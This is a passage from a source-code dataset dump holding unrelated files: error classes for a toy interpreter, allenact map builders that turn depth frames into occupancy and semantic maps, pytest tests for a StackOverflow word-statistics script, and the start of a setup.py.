            ``ln`` and ``ftxt`` attributes).
        pos_end: position where the erroneous span ends.
        error_name: human-readable error-category name, e.g. "Invalid Syntax".
        details: description of what went wrong.
    """

    def __init__(self, pos_start, pos_end, error_name, details):
        """
        :param pos_start: error start position
        :param pos_end: error end position
        :param error_name: error-category name
        :param details: error details
        """
        self.pos_start = pos_start
        self.pos_end = pos_end
        self.error_name = error_name
        self.details = details

    def as_string(self):
        """Render the error as a multi-line message with a source excerpt."""
        result = f'{self.error_name}: {self.details}'
        # Bug fix: a newline is needed before the file information; without it
        # the details and "File ..." run together, e.g. the previously observed
        # output "Invalid Syntax: Expected int or floatFile <stdin>, line 1".
        result += f'\nFile {self.pos_start.fn}, line {self.pos_start.ln + 1}'
        # string_with_arrows() underlines the offending span, e.g.
        #   4 *
        #     ^
        result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
        return result
class IllegalCharError(Error):
    """Raised by the lexer when it meets a character it cannot tokenize."""

    def __init__(self, pos_start, pos_end, details):
        super().__init__(pos_start, pos_end, "Illegal Character", details)
class ExpectedCharError(Error):
    """Raised when a specific character was expected but not found."""

    def __init__(self, pos_start, pos_end, details):
        super().__init__(pos_start, pos_end, 'Expected Character', details)
class InvalidSyntaxError(Error):
    """Raised by the parser when the token stream is not valid syntax."""

    def __init__(self, pos_start, pos_end, details=''):
        super().__init__(pos_start, pos_end, 'Invalid Syntax', details)
class RTError(Error):
    """Runtime error that also records the execution context so a
    Python-style traceback can be generated."""

    def __init__(self, pos_start, pos_end, detail, context):
        super().__init__(pos_start, pos_end, "Runtime Error", detail)
        # Execution context (call chain) in which the error occurred.
        self.context = context

    def as_string(self):
        # Traceback first, then the error line, then the annotated source excerpt.
        result = self.generate_traceback()
        result += f'{self.error_name}: {self.details}'
        result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
        return result

    def generate_traceback(self):
        """
        Build the error-traceback text from the context chain.
        :return: traceback string, outermost frame first.
        """
        result = ''
        pos = self.pos_start
        ctx = self.context
        # Walk the runtime contexts outward, prepending one frame per level,
        # building output such as:
        # Traceback (most recent call last):
        #   File <stdin>, line 1, in <program>
        # Runtime Error: Division by zero
        #
        # 1 / 0
        #     ^
        while ctx:
            # pos.fn => source file; pos.ln + 1 => line number;
            # ctx.display_name => name of the enclosing context
            result = f' File {pos.fn}, line {str(pos.ln + 1)}, in {ctx.display_name}\n' + result
            pos = ctx.parent_entry_pos
            ctx = ctx.parent
        return 'Traceback (most recent call last):\n' + result
"liaomw@huitouche.com"
] | liaomw@huitouche.com |
695b0730a411e071970885a7c9a14c7fb5b55754 | 444ef2c07e05cf6b2c85ee33535f228d7c5b384e | /allenact/embodiedai/mapping/mapping_utils/map_builders.py | 1d31f53f59e84ca4263e6e57f69e0ff2ca84cf30 | [
"MIT"
] | permissive | zcczhang/allenact | 4d92d771e31868c3e6909c358787b46d2ff995fa | 4657479e8127393f5996e70649da2e2a7eae7332 | refs/heads/main | 2023-08-21T19:30:19.397165 | 2021-10-06T17:33:58 | 2021-10-06T17:33:58 | 396,886,059 | 2 | 0 | NOASSERTION | 2021-08-16T16:52:59 | 2021-08-16T16:52:58 | null | UTF-8 | Python | false | false | 23,116 | py | # MIT License
#
# Original Copyright (c) 2020 Devendra Chaplot
#
# Modified work Copyright (c) 2021 Allen Institute for Artificial Intelligence
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
from typing import Optional, Sequence, Union, Dict
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from allenact.embodiedai.mapping.mapping_utils.point_cloud_utils import (
depth_frame_to_world_space_xyz,
project_point_cloud_to_map,
)
class BinnedPointCloudMapBuilder(object):
    """Class used to iteratively construct a map of "free space" based on input
    depth maps (i.e. pointclouds).

    Adapted from https://github.com/devendrachaplot/Neural-SLAM

    This class can be used to (iteratively) construct a metric map of free space in an environment as
    an agent moves around. After every step the agent takes, you should call the `update` function and
    pass the agent's egocentric depth image along with the agent's new position. This depth map will
    be converted into a pointcloud, binned along the up/down axis, and then projected
    onto a 3-dimensional tensor of shape (HxWxC) where HxW represents the ground plane
    and where C equals the number of bins the up-down coordinate was binned into. This 3d map counts the
    number of points in each bin. Thus a lack of points within a region can be used to infer that
    that region is free space.

    # Attributes

    fov : FOV of the camera used to produce the depth images given when calling `update`.
    vision_range_in_map_units : The maximum distance (in number of rows/columns) that will
        be updated when calling `update`, points outside of this map vision range are ignored.
    map_size_in_cm : Total map size in cm.
    resolution_in_cm : Number of cm per row/column in the map.
    height_bins : The bins used to bin the up-down coordinate (for us the y-coordinate). For example,
        if `height_bins = [0.1, 1]` then
        all y-values < 0.1 will be mapped to 0, all y values in [0.1, 1) will be mapped to 1, and
        all y-values >= 1 will be mapped to 2.
        **Importantly:** these y-values will first be recentered by the `min_xyz` value passed when
        calling `reset(...)`.
    device : A `torch.device` on which to run computations. If this device is a GPU you can potentially
        obtain significant speed-ups.
    """

    def __init__(
        self,
        fov: float,
        vision_range_in_cm: int,
        map_size_in_cm: int,
        resolution_in_cm: int,
        height_bins: Sequence[float],
        device: torch.device = torch.device("cpu"),
    ):
        # The vision range must correspond to a whole number of map cells.
        assert vision_range_in_cm % resolution_in_cm == 0

        self.fov = fov
        self.vision_range_in_map_units = vision_range_in_cm // resolution_in_cm
        self.map_size_in_cm = map_size_in_cm
        self.resolution_in_cm = resolution_in_cm
        self.height_bins = height_bins
        self.device = device

        # (map_size)x(map_size)x(len(height_bins) + 1) array of per-bin point counts.
        self.binned_point_cloud_map = np.zeros(
            (
                self.map_size_in_cm // self.resolution_in_cm,
                self.map_size_in_cm // self.resolution_in_cm,
                len(self.height_bins) + 1,
            ),
            dtype=np.float32,
        )

        self.min_xyz: Optional[np.ndarray] = None

    def update(
        self,
        depth_frame: np.ndarray,
        camera_xyz: np.ndarray,
        camera_rotation: float,
        camera_horizon: float,
    ) -> Dict[str, np.ndarray]:
        """Updates the map with the input depth frame from the agent.

        See the `allenact.embodiedai.mapping.mapping_utils.point_cloud_utils.project_point_cloud_to_map`
        function for more information input parameter definitions. **We assume that the input
        `depth_frame` has depths recorded in meters**.

        # Returns
        Let `map_size = self.map_size_in_cm // self.resolution_in_cm`. Returns a dictionary with keys-values:

        * `"egocentric_update"` - A tensor of shape
        `(vision_range_in_map_units)x(vision_range_in_map_units)x(len(self.height_bins) + 1)` corresponding
        to the binned pointcloud after having been centered on the agent and rotated so that
        points ahead of the agent correspond to larger row indices and points further to the right of the agent
        correspond to larger column indices. Note that by "centered" we mean that one can picture
         the agent as being positioned at (0, vision_range_in_map_units/2) and facing downward. Each entry in this tensor
        is a count equaling the number of points in the pointcloud that, once binned, fell into this
        entry. This is likely the output you want to use if you want to build a model to predict free space from an image.
        * `"allocentric_update"` - A `(map_size)x(map_size)x(len(self.height_bins) + 1)` corresponding
        to `"egocentric_update"` but rotated to the world-space coordinates. This `allocentric_update`
        is what is used to update the internally stored representation of the map.
        * `"map"` -  A `(map_size)x(map_size)x(len(self.height_bins) + 1)` tensor corresponding
        to the sum of all `"allocentric_update"` values since the last `reset()`.
        """
        with torch.no_grad():
            assert self.min_xyz is not None, "Please call `reset` before `update`."

            camera_xyz = (
                torch.from_numpy(camera_xyz - self.min_xyz).float().to(self.device)
            )

            depth_frame = torch.from_numpy(depth_frame).to(self.device)
            # Ignore depths beyond the configured vision range. Note: `np.nan` is
            # used rather than the `np.NaN` alias which was removed in NumPy 2.0.
            depth_frame[
                depth_frame
                > self.vision_range_in_map_units * self.resolution_in_cm / 100
            ] = np.nan

            world_space_point_cloud = depth_frame_to_world_space_xyz(
                depth_frame=depth_frame,
                camera_world_xyz=camera_xyz,
                rotation=camera_rotation,
                horizon=camera_horizon,
                fov=self.fov,
            )

            world_binned_map_update = project_point_cloud_to_map(
                xyz_points=world_space_point_cloud,
                bin_axis="y",
                bins=self.height_bins,
                map_size=self.binned_point_cloud_map.shape[0],
                resolution_in_cm=self.resolution_in_cm,
                flip_row_col=True,
            )

            # Center the cloud on the agent
            recentered_point_cloud = world_space_point_cloud - (
                torch.FloatTensor([1.0, 0.0, 1.0]).to(self.device) * camera_xyz
            ).reshape((1, 1, 3))
            # Rotate the cloud so that positive-z is the direction the agent is looking
            theta = (
                np.pi * camera_rotation / 180
            )  # No negative since THOR rotations are already backwards
            cos_theta = np.cos(theta)
            sin_theta = np.sin(theta)
            rotation_transform = torch.FloatTensor(
                [
                    [cos_theta, 0, -sin_theta],
                    [0, 1, 0],  # unchanged
                    [sin_theta, 0, cos_theta],
                ]
            ).to(self.device)
            rotated_point_cloud = recentered_point_cloud @ rotation_transform.T
            xoffset = (self.map_size_in_cm / 100) / 2
            agent_centric_point_cloud = rotated_point_cloud + torch.FloatTensor(
                [xoffset, 0, 0]
            ).to(self.device)

            allocentric_update_numpy = world_binned_map_update.cpu().numpy()
            self.binned_point_cloud_map = (
                self.binned_point_cloud_map + allocentric_update_numpy
            )

            agent_centric_binned_map = project_point_cloud_to_map(
                xyz_points=agent_centric_point_cloud,
                bin_axis="y",
                bins=self.height_bins,
                map_size=self.binned_point_cloud_map.shape[0],
                resolution_in_cm=self.resolution_in_cm,
                flip_row_col=True,
            )
            # Crop the egocentric map down to the agent's vision range,
            # keeping the rows ahead of the agent and the columns centered on it.
            vr = self.vision_range_in_map_units
            vr_div_2 = self.vision_range_in_map_units // 2
            width_div_2 = agent_centric_binned_map.shape[1] // 2
            agent_centric_binned_map = agent_centric_binned_map[
                :vr, (width_div_2 - vr_div_2) : (width_div_2 + vr_div_2), :
            ]

            return {
                "egocentric_update": agent_centric_binned_map.cpu().numpy(),
                "allocentric_update": allocentric_update_numpy,
                "map": self.binned_point_cloud_map,
            }

    def reset(self, min_xyz: np.ndarray):
        """Reset the map.

        Resets the internally stored map.

        # Parameters
        min_xyz : An array of size (3,) corresponding to the minimum possible x, y, and z values that will be observed
            as a point in a pointcloud when calling `.update(...)`. The (world-space) maps returned by calls to `update`
            will have been normalized so the (0,0,:) entry corresponds to these minimum values.
        """
        self.min_xyz = min_xyz
        self.binned_point_cloud_map = np.zeros_like(self.binned_point_cloud_map)
class ObjectHull2d:
    """The 2d convex hull of an object projected onto the ground plane.

    # Attributes

    object_id : A unique id for the object.
    object_type : The type of the object.
    hull_points : An Nx2 matrix of hull vertices where column 0 holds the x
        coordinates and column 1 the z coordinates (Unity convention: the y
        axis is up/down, so the ground plane is xz). A non-array sequence of
        (x, z) pairs is converted to a `np.ndarray`; an array is kept as-is.
    """

    def __init__(
        self,
        object_id: str,
        object_type: str,
        hull_points: Union[np.ndarray, Sequence[Sequence[float]]],
    ):
        self.object_id = object_id
        self.object_type = object_type
        if isinstance(hull_points, np.ndarray):
            self.hull_points = hull_points
        else:
            self.hull_points = np.array(hull_points)
class SemanticMapBuilder(object):
    """Class used to iteratively construct a semantic map based on input depth
    maps (i.e. pointclouds).

    Adapted from https://github.com/devendrachaplot/Neural-SLAM

    This class can be used to (iteratively) construct a semantic map of objects in the environment.

    This map is similar to that generated by `BinnedPointCloudMapBuilder` (see its documentation for
    more information) but the various channels correspond to different object types. Thus
    if the `(i,j,k)` entry of a map generated by this function is `True`, this means that an
    object of type `k` is present in position `i,j` in the map. In particular, by "present" we mean that,
    after projecting the object to the ground plane and taking the convex hull of the resulting
    2d object, a non-trivial portion of this convex hull overlaps the `i,j` position.

    For attribute information, see the documentation of the `BinnedPointCloudMapBuilder` class. The
    only attribute present in this class that is not present in `BinnedPointCloudMapBuilder` is
    `ordered_object_types` which corresponds to a list of unique object types where
    object type `ordered_object_types[i]` will correspond to the `i`th channel of the map
    generated by this class.
    """

    def __init__(
        self,
        fov: float,
        vision_range_in_cm: int,
        map_size_in_cm: int,
        resolution_in_cm: int,
        ordered_object_types: Sequence[str],
        device: torch.device = torch.device("cpu"),
    ):
        self.fov = fov
        self.vision_range_in_map_units = vision_range_in_cm // resolution_in_cm
        self.map_size_in_cm = map_size_in_cm
        self.resolution_in_cm = resolution_in_cm
        self.ordered_object_types = tuple(ordered_object_types)
        self.device = device

        # Maps each object type to its channel index in the semantic map.
        self.object_type_to_index = {
            ot: i for i, ot in enumerate(self.ordered_object_types)
        }

        # (map_size)x(map_size)x(num_object_types) ground-truth occupancy map.
        self.ground_truth_semantic_map = np.zeros(
            (
                self.map_size_in_cm // self.resolution_in_cm,
                self.map_size_in_cm // self.resolution_in_cm,
                len(self.ordered_object_types),
            ),
            dtype=np.uint8,
        )
        # Which map cells the agent has observed since the last `reset`.
        self.explored_mask = np.zeros(
            (
                self.map_size_in_cm // self.resolution_in_cm,
                self.map_size_in_cm // self.resolution_in_cm,
                1,
            ),
            dtype=bool,
        )

        self.min_xyz: Optional[np.ndarray] = None

    @staticmethod
    def randomly_color_semantic_map(
        map: Union[np.ndarray, torch.Tensor], threshold: float = 0.5, seed: int = 1
    ) -> np.ndarray:
        """Assign each channel of `map` a (seeded) random RGB color.

        Positions where no channel exceeds `threshold` are colored black.
        """
        if not isinstance(map, np.ndarray):
            map = np.array(map)

        rnd = random.Random(seed)
        semantic_int_mat = (
            (map >= threshold)
            * np.array(list(range(1, map.shape[-1] + 1))).reshape((1, 1, -1))
        ).max(-1)
        # noinspection PyTypeChecker
        return np.uint8(
            np.array(
                [(0, 0, 0)]
                + [
                    # Bug fix: `Random.randint` is inclusive on both ends, so
                    # the upper bound must be 255 — 256 would wrap to 0 when
                    # cast to uint8 below.
                    tuple(rnd.randint(0, 255) for _ in range(3))
                    for _ in range(map.shape[-1])
                ]
            )[semantic_int_mat]
        )

    def _xzs_to_colrows(self, xzs: np.ndarray):
        """Convert world-space (x, z) coordinates to (col, row) map indices,
        clipped to the map bounds."""
        height, width, _ = self.ground_truth_semantic_map.shape

        return np.clip(
            np.int32(
                (
                    (100 / self.resolution_in_cm)
                    * (xzs - np.array([[self.min_xyz[0], self.min_xyz[2]]]))
                )
            ),
            a_min=0,
            a_max=np.array(
                [width - 1, height - 1]
            ),  # width then height as we're returns cols then rows
        )

    def build_ground_truth_map(self, object_hulls: Sequence[ObjectHull2d]):
        """Rasterize the given object hulls into `self.ground_truth_semantic_map`,
        one channel per known object type (unknown types are skipped)."""
        self.ground_truth_semantic_map.fill(0)

        height, width, _ = self.ground_truth_semantic_map.shape
        for object_hull in object_hulls:
            ot = object_hull.object_type

            if ot in self.object_type_to_index:
                ind = self.object_type_to_index[ot]

                self.ground_truth_semantic_map[
                    :, :, ind : (ind + 1)
                ] = cv2.fillConvexPoly(
                    img=np.array(
                        self.ground_truth_semantic_map[:, :, ind : (ind + 1)],
                        dtype=np.uint8,
                    ),
                    points=self._xzs_to_colrows(np.array(object_hull.hull_points)),
                    color=255,
                )

    def update(
        self,
        depth_frame: np.ndarray,
        camera_xyz: np.ndarray,
        camera_rotation: float,
        camera_horizon: float,
    ) -> Dict[str, np.ndarray]:
        """Updates the map with the input depth frame from the agent.

        See the documentation for `BinnedPointCloudMapBuilder.update`,
        the inputs and outputs are similar except that channels are used
        to represent the presence/absence of objects of given types.
        Unlike `BinnedPointCloudMapBuilder.update`, this function also
        returns two masks with keys `"egocentric_mask"` and `"mask"`
        that can be used to determine what portions of the map have been
        observed by the agent so far in the egocentric and world-space
        reference frames respectively.
        """
        with torch.no_grad():
            assert self.min_xyz is not None

            camera_xyz = torch.from_numpy(camera_xyz - self.min_xyz).to(self.device)
            map_size = self.ground_truth_semantic_map.shape[0]

            depth_frame = torch.from_numpy(depth_frame).to(self.device)
            # Ignore depths beyond the vision range. Note: `np.nan` is used
            # rather than the `np.NaN` alias which was removed in NumPy 2.0.
            depth_frame[
                depth_frame
                > self.vision_range_in_map_units * self.resolution_in_cm / 100
            ] = np.nan

            world_space_point_cloud = depth_frame_to_world_space_xyz(
                depth_frame=depth_frame,
                camera_world_xyz=camera_xyz,
                rotation=camera_rotation,
                horizon=camera_horizon,
                fov=self.fov,
            )

            world_newly_explored = (
                project_point_cloud_to_map(
                    xyz_points=world_space_point_cloud,
                    bin_axis="y",
                    bins=[],
                    map_size=map_size,
                    resolution_in_cm=self.resolution_in_cm,
                    flip_row_col=True,
                )
                > 0.001
            )
            world_update_and_mask = torch.cat(
                (
                    torch.logical_and(
                        torch.from_numpy(self.ground_truth_semantic_map).to(
                            self.device
                        ),
                        world_newly_explored,
                    ),
                    world_newly_explored,
                ),
                dim=-1,
            ).float()
            world_update_and_mask_for_sample = world_update_and_mask.unsqueeze(
                0
            ).permute(0, 3, 1, 2)

            # We now use grid sampling to rotate world_update_for_sample into the egocentric coordinate
            # frame of the agent so that the agent's forward direction is downwards in the tensor
            # (and it's right side is to the right in the image, this means that right/left
            # when taking the perspective of the agent in the image). This convention aligns with
            # what's expected by grid_sample where +x corresponds to +cols and +z corresponds to +rows.
            # Here also the rows/cols have been normalized so that the center of the image is at (0,0)
            # and the bottom right is at (1,1).

            # Mentally you can think of the output from the F.affine_grid function as you wanting
            # rotating/translating an axis-aligned square on the image-to-be-sampled and then
            # copying whatever is in this square to a new image. Note that the translation always
            # happens in the global reference frame after the rotation. We'll start by rotating
            # the square so that the the agent's z direction is downwards in the image.
            # Since the global axis of the map and the grid sampling are aligned, this requires
            # rotating the square by the rotation of the agent. As rotation is negative the usual
            # standard in THOR, we need to negate the rotation of the agent.
            theta = -np.pi * camera_rotation / 180

            # Here form the rotation matrix
            cos_theta = np.cos(theta)
            sin_theta = np.sin(theta)
            rot_mat = torch.FloatTensor(
                [[cos_theta, -sin_theta], [sin_theta, cos_theta]]
            ).to(self.device)

            # Now we need to figure out the translation. For an intuitive understanding, we break this
            # translation into two different "offsets". The first offset centers the square on the
            # agent's current location:
            scaler = 2 * (100 / (self.resolution_in_cm * map_size))
            offset_to_center_the_agent = (
                scaler
                * torch.FloatTensor([camera_xyz[0], camera_xyz[2]])
                .unsqueeze(-1)
                .to(self.device)
                - 1
            )

            # The second offset moves the square in the direction of the agent's z direction
            # so that the output image will have the agent's view starting directly at the
            # top of the image.
            offset_to_top_of_image = rot_mat @ torch.FloatTensor([0, 1.0]).unsqueeze(
                1
            ).to(self.device)
            rotation_and_translate_mat = torch.cat(
                (rot_mat, offset_to_top_of_image + offset_to_center_the_agent,), dim=1,
            )

            ego_update_and_mask = F.grid_sample(
                world_update_and_mask_for_sample.to(self.device),
                F.affine_grid(
                    rotation_and_translate_mat.to(self.device).unsqueeze(0),
                    world_update_and_mask_for_sample.shape,
                    align_corners=False,
                ),
                align_corners=False,
            )

            # All that's left now is to crop out the portion of the transformed tensor that we actually
            # care about (i.e. the portion corresponding to the agent's `self.vision_range_in_map_units`.
            vr = self.vision_range_in_map_units
            half_vr = vr // 2
            center = self.map_size_in_cm // (2 * self.resolution_in_cm)
            cropped = ego_update_and_mask[
                :, :, :vr, (center - half_vr) : (center + half_vr)
            ]

            np.logical_or(
                self.explored_mask,
                world_newly_explored.cpu().numpy(),
                out=self.explored_mask,
            )

            return {
                "egocentric_update": cropped[0, :-1].permute(1, 2, 0).cpu().numpy(),
                "egocentric_mask": (cropped[0, -1:].view(vr, vr, 1) > 0.001)
                .cpu()
                .numpy(),
                "explored_mask": np.array(self.explored_mask),
                "map": np.logical_and(
                    self.explored_mask, (self.ground_truth_semantic_map > 0)
                ),
            }

    def reset(self, min_xyz: np.ndarray, object_hulls: Sequence[ObjectHull2d]):
        """Reset the map.

        Resets the internally stored map.

        # Parameters
        min_xyz : An array of size (3,) corresponding to the minimum possible x, y, and z values that will be observed
            as a point in a pointcloud when calling `.update(...)`. The (world-space) maps returned by calls to `update`
            will have been normalized so the (0,0,:) entry corresponds to these minimum values.
        object_hulls : The object hulls corresponding to objects in the scene. These will be used to
            construct the map.
        """
        self.min_xyz = min_xyz
        self.build_ground_truth_map(object_hulls=object_hulls)
| [
"lucaw@allenai.org"
] | lucaw@allenai.org |
da3e29610a1aa1a80ddc22bf6047915f966e07d3 | 3e60df8580f3dd1f11a00856fbb1ccc974f3e2d9 | /HW2/test_stackoverflow_analytics.py | 8cbc7d1708e375e8b173d6720091d025bb07f7b5 | [] | no_license | StepDan23/MADE_python_for_prodaction | 96148db4a3784655bfcb76aa1eb1151b5598538a | a7166e504c9aceef3253aeb49317d257b4aae953 | refs/heads/master | 2023-02-27T08:37:57.893047 | 2021-02-01T15:24:49 | 2021-02-01T15:24:49 | 333,349,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,592 | py | from argparse import ArgumentParser
import pytest
from unittest.mock import patch
from stackoverflow_analytics import WordStatistic, setup_parser
NOT_EXIST_FILEPATH = 'not_exist_filepath'
def total_size_of_dict_of_dict(dictionary):
all_keys = set()
for inner_dict in dictionary.values():
all_keys.update(inner_dict.keys())
return len(all_keys)
def test_setup_parser_show_help_empty_args():
    """With an empty argv, setting up the parser should exit via the help path."""
    parser = ArgumentParser()
    with patch('sys.argv', ['']), pytest.raises(SystemExit):
        setup_parser(parser)
def test_parse_args_raise_file_not_exist():
    """Argument parsing should exit when the supplied paths do not exist."""
    parser = ArgumentParser()
    setup_parser(parser)
    cli_args = [
        '--questions', NOT_EXIST_FILEPATH,
        '--stop-words', NOT_EXIST_FILEPATH,
        '--queries', NOT_EXIST_FILEPATH,
    ]
    with patch('sys.argv', [''] + cli_args), pytest.raises(SystemExit):
        parser.parse_args()
@pytest.mark.parametrize('data, expected_len', [
    ('word are are', 2),
    ('word are', 2),
    ('', 0),
])
def test_load_stop_words(data, expected_len):
    """Stop words loaded from a whitespace-separated string are deduplicated."""
    statistic = WordStatistic()
    statistic.load_stop_words(data.split())
    assert len(statistic.stop_words) == expected_len
@pytest.mark.parametrize('data, expected_len', [
    (['<row PostTypeId="1" CreationDate="2010-11-15T20:09:58.970" Score="1" Title="SQL Server" />'], 1),
    (['<row PostTypeId="1" CreationDate="2010-11-15T20:09:58.970" Score="1" Title="SQL Server" />',
      '<row PostTypeId="2" CreationDate="2010-11-15T20:09:58.970" Score="1" Title="SQL Server" />'], 1),
    (['<row PostTypeId="1" CreationDate="some_year" Score="1" Title="SQL Server" />'], 0),
    ([' PostTypeId="1" CreationDate="2010-11-15T20:09:58.970" Score="1" Title="SQL Server" />'], 0),
    (['<row PostTypeId="1" CreationDate="2010-11-15T20:09:58.970" Title="SQL Server" />'], 0),
    (['<row PostTypeId="1" CreationDate="2010-11-15T20:09:58.970" Score="1" Title="SQL Server"'], 0),
    (['<row PostTypeId="1" CreationDate="time" Score="1" Title="SQL Server'], 0),
])
def test_parse_documents_validation(data, expected_len):
    """Only well-formed question rows should survive document parsing."""
    parsed = WordStatistic().parse_documents(data)
    assert len(parsed) == expected_len
@pytest.mark.parametrize('doc_info, expected_year_len, expected_words_len', [
    ([(1999, -2, 'word $word are'),
      (1999, -2, 'another word,word')], 1, 3),
    ([(1999, -2, 'word wOrd woRd'),
      (2000, -2, 'Word word $word')], 2, 1),
])
def test_add_new_document_year_and_word_counts(doc_info, expected_year_len, expected_words_len):
    """Adding documents buckets statistics per year and counts unique words.

    Renamed from ``test_add_new_document``: a later function in this module
    had the identical name, so this definition was shadowed and pytest never
    collected it.
    """
    statistic = WordStatistic()
    for doc_year, doc_score, doc_text in doc_info:
        statistic.add_new_document_to_statistic(doc_year, doc_score, doc_text)
    assert expected_year_len == len(statistic.words_statistic)
    words_count = total_size_of_dict_of_dict(statistic.words_statistic)
    assert expected_words_len == words_count
@pytest.mark.parametrize('doc_year, doc_score, doc_text, expected_total_score', [
    (1999, 10, 'word $word are', 20),
    (1999, 10, 'word $word word', 10),
    (1999, 20, '', 0),
])
def test_add_new_document_total_score(doc_year, doc_score, doc_text, expected_total_score):
    """Each unique word in a document accrues the document score once.

    Renamed from ``test_add_new_document``: that name duplicated an earlier
    test in this module (the earlier definition was silently shadowed), so
    both tests now have unique, descriptive names.
    """
    statistic = WordStatistic()
    statistic.add_new_document_to_statistic(doc_year, doc_score, doc_text)
    total_score = sum(statistic.words_statistic[doc_year].values())
    assert expected_total_score == total_score
# Word cleanup is case-insensitive and strips punctuation/sigils ($word,
# word,word), as shown by the last case where 'word' as a stop word removes
# every token.
@pytest.mark.parametrize('doc_info, stop_words, expected_words_len', [
    ([(1999, -2, 'word $word are'),
      (1999, -2, 'another word,word')], [], 3),
    ([(1999, -2, 'word $word are'),
      (2000, -2, 'another word,word')], ['word', 'another'], 1),
    ([(1999, -2, 'word wOrd woRd'),
      (2000, -2, 'Word word $word')], ['word'], 0),
])
def test_add_new_document_with_stop_words(doc_info, stop_words, expected_words_len):
    """Stop words must be excluded from the per-year word statistics."""
    statistic = WordStatistic()
    statistic.load_stop_words(stop_words)
    for doc_year, doc_score, doc_text in doc_info:
        statistic.add_new_document_to_statistic(doc_year, doc_score, doc_text)
    words_count = total_size_of_dict_of_dict(statistic.words_statistic)
    assert expected_words_len == words_count
@pytest.mark.parametrize('queries, expected_queries_len', [
    (['1999,2000,3', '1999,2000,3', '1999,2000,3'], 3),
    (['1999,2000,text', '2000,3', '1999,,3'], 0),
    (['1999,2000,3', '1999,text,3', '1999,2000,3'], 2),
])
def test_parse_queries(queries, expected_queries_len):
    """parse_queries keeps only well-formed "start,end,top_n" query strings.

    Renamed from ``test_add_new_document_with_stop_words``: the old name
    duplicated an earlier test (shadowing it in pytest collection) and did
    not describe what is actually exercised here, which is query parsing.
    """
    statistic = WordStatistic()
    valid_queries = statistic.parse_queries(queries)
    assert expected_queries_len == len(valid_queries)
@pytest.mark.parametrize('start_year, end_year, top_n, expected_answer', [
    (2000, 2000, 2, '{"start": 2000, "end": 2000, "top": []}'),
    (2019, 2019, 2, '{"start": 2019, "end": 2019, "top": [["seo", 15], ["better", 10]]}'),
    (2019, 2020, 4,
     '{"start": 2019, "end": 2020, "top": [["better", 30], ["javascript", 20], ["python", 20], ["seo", 15]]}')
])
def test_calculate_statistic(start_year, end_year, top_n, expected_answer):
    """End-to-end check of calculate_statistic's JSON answer.

    From the fixtures: a word accrues a document's score once per document
    ("better" occurs three times in one 10-point document but scores 10 for
    2019); stop words are excluded; the top list is sorted by score
    descending, then alphabetically, and truncated to top_n.
    """
    doc_info = [(2019, 10, 'Is SEO better better better done with repetition?'),
                (2019, 5, 'What is SEO?'),
                (2020, 20, 'Is Python better than Javascript?')
                ]
    stop_words = ['is', 'than']
    statistic = WordStatistic()
    statistic.load_stop_words(stop_words)
    for doc_year, doc_score, doc_text in doc_info:
        statistic.add_new_document_to_statistic(doc_year, doc_score, doc_text)
    answer = statistic.calculate_statistic(start_year, end_year, top_n)
    assert expected_answer == answer
| [
"mix2ra93@mail.ru"
] | mix2ra93@mail.ru |
9853adc4987d40133d9350088b70b19b22b4c19d | 24d4afbf1f6316b3a607308349fd887c13ffe9ee | /Scripts/HT_scripts/ht/setup.py | a8e5ed3d27e2c0e037ea37f695abbc5c93997797 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | mylenre/Data_phD | 65d97adaf39fcd79d8228679ada6602e86af6995 | ee5122fe405fd00b99b53e248299a18199bfa35a | refs/heads/master | 2023-05-07T20:04:56.183354 | 2021-05-28T15:42:55 | 2021-05-28T15:42:55 | 210,873,457 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,489 | py | # -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
from setuptools import setup
# Trove classifiers advertised on PyPI (https://pypi.org/classifiers/).
classifiers=[
    'Development Status :: 3 - Alpha',
    'Intended Audience :: Developers',
    'Intended Audience :: Education',
    'Intended Audience :: Manufacturing',
    'Intended Audience :: Science/Research',
    'License :: OSI Approved :: MIT License',
    'Natural Language :: English',
    'Operating System :: MacOS',
    'Operating System :: Microsoft :: Windows',
    'Operating System :: POSIX',
    'Operating System :: POSIX :: BSD',
    'Operating System :: POSIX :: Linux',
    'Operating System :: Unix',
    'Programming Language :: Python',
